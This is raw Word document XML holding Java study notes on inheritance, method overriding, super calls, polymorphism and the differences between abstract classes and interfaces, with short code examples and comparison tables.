    <w:p w14:paraId="68584756" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">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Accessing Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB5A681" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">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1. Accessing Parent Method from Child Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC16ACB"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hild c = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032AD5FA"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show();    // Parent method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5F7E56"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display(); // Child method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737E6AA7" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">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2. Accessing Overridden Parent Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE8F77"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child overrides a parent method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36629961"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Parent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA2ED36"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show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28731BB1"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Parent show()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FA1E81"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0712676"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FDD5069" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6862BA49"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Child extends Parent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E918353"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1F67C3D9"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show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD11440"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hild show()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7202D2D5"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15F31AF"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C01ED99"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hild c = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2104FD7F"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show(); // Child show() — overridden version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577DAECD" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F7638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4A6046C">
          <v:rect id="_x0000_i1325" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA7DB1F" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">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3. Calling Parent’s Version Using super</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418DF646"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o access the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent’s method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the child:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2DB63D"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Child extends Parent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB5480F"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579A31B4"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show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171A074"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uper.show(); // Calls parent show()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2568B9"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hild show()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F27DF"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119655D"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65261FA"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71856858"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arent show()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600DE79"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hild show()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A638E05" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F7638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004A8D5">
          <v:rect id="_x0000_i1326" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C02ED" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">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4. Accessing Child and Parent Methods Separately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0718FEEA"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arent p = new Parent();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F80F0D"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show(); // Parent method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6660D5" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419D8F90"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hild c = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54996C64"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c.show();    // Overridden method in Child</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE01372"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display(); // Child's own method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B56AB18" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F7638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DCDC81F">
          <v:rect id="_x0000_i1327" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE97C7" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">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5. Using Polymorphism (Reference of Parent, Object of Child)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4181E3"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arent p = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20BE14"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show(); // Calls Child's overridden method (runtime polymorphism)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3928CC39"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display(); // </w:t>
      </w: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Compile error (method not in Parent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F8111"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o call display():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52776BA0"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hild) p).display(); // </w:t>
      </w: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Safe after type casting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A68BC1B" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F7638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A8337D0">
          <v:rect id="_x0000_i1328" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F052FA0" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F76381">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17"/>
        <w:gridCol w:w="4330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F76381" w:rsidRPr="00CE4B95" w14:paraId="2AD66E85" w14:textId="77777777" w:rsidTr="00FC276F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7500E277" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F7638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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DFCEB2A" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F7638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ccess</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F76381" w:rsidRPr="00CE4B95" w14:paraId="1A521DC5" w14:textId="77777777" w:rsidTr="00FC276F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F5AA9FF"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arent methods in Child</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="543898FE"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herited directly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F76381" w:rsidRPr="00CE4B95" w14:paraId="3F0B6268" w14:textId="77777777" w:rsidTr="00FC276F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B4CCBB5"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verridden method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C2FC0FD"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hild's version takes priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F76381" w:rsidRPr="00CE4B95" w14:paraId="6BED641E" w14:textId="77777777" w:rsidTr="00FC276F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32CB07F9"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ll Parent’s method inside Child</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31FDAD48"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per.methodName()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F76381" w:rsidRPr="00CE4B95" w14:paraId="2EB2A101" w14:textId="77777777" w:rsidTr="00FC276F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D26BF40"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olymorphism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2283A08A" w14:textId="77777777" w:rsidR="00FC276F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC276F" w:rsidP="00F763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arent reference calls overridden methods only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D9D1F46" w14:textId="4283F448" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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7CEA45C8">
          <v:rect id="_x0000_i1329" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47489929" w14:textId="71063328" w:rsidR="00273F1F" w:rsidRPr="00CE4B95" w:rsidRDefault="00273F1F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc196307598"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between interface and abstract class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w14:paraId="0F3AA869" w14:textId="6664DE28" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Abstract Class vs Interfa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8"/>
        <w:gridCol w:w="3564"/>
        <w:gridCol w:w="5002"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="34539375" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="585B8123" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B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4975F002" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B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bstract Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C8563D4" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B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terface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="56A1D7AF" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="054CC85F"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ype of Relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DAFA852"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s-a"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06D93A65"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lements"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="6F93119F" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19DC27BF"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Keyword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DED95B1"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bstract class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E946FD6"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="5E6F4798" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7817F965"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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AC7829D"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have abstract and non-abstract (concrete) methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62EAA2AA"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ly abstract methods by default (till Java 7); Java 8+ allows default and static methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="481504A6" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E1A8B60"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elds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B61D711"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have variables (instance and static)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43845DF3"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ly public static final (constants)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="078C057F" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6960382F"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structors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B5841C9"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 can have constructors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73E08645"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No constructors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="7D5E858A" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21BB9981"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ultiple Inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34FC9E77"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Not supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A580256"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Can implement multiple interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="4F05C1F3" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E35F958"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 Modifiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67AB6255"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use private, protected, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34E84E04"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l methods are public abstract by default (till Java 7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="45585FC4" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AEE6098"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hen to Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15FC6E7A"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want to share code among closely related classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10270E32"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want to define a contract that multiple classes can implement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="3F08AC68" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A5EC69B"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ava 8+ Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50F6116F"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use static methods, default methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B07A319"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also use static and default methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4ACADFB5" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FD07B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1B27BC5">
          <v:rect id="_x0000_i1330" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F4F8FF" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">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of Abstract Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48012B19"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bstract class Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDF3D77"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bstract void makeSound();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6245E0D6" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCF4D15"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sleep() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CCE238"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leeping...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430F2BAD"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80B6191"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7AAC9B9" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FD07B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74312E6">
          <v:rect id="_x0000_i1331" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E099413" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">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of Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30827CE3"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Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FDDE18"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start(); // public abstract by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3DF916" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A89ADF1"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efault void fuelType() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2AE12"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Petrol/Diesel");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393CD93B"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E668D77"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4DF0AF" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FD07B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38F5B1">
          <v:rect id="_x0000_i1332" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C175D7E" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">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an You Combine Them?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476A5E40"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 A class can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE8EEC" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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tend one abstract class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ADCD21" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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mplement multiple interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A312DB"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Car extends VehicleBase implements Vehicle, Electric {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221700F4"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implement interface methods</w:t>
      </w:r>
    </w:p>
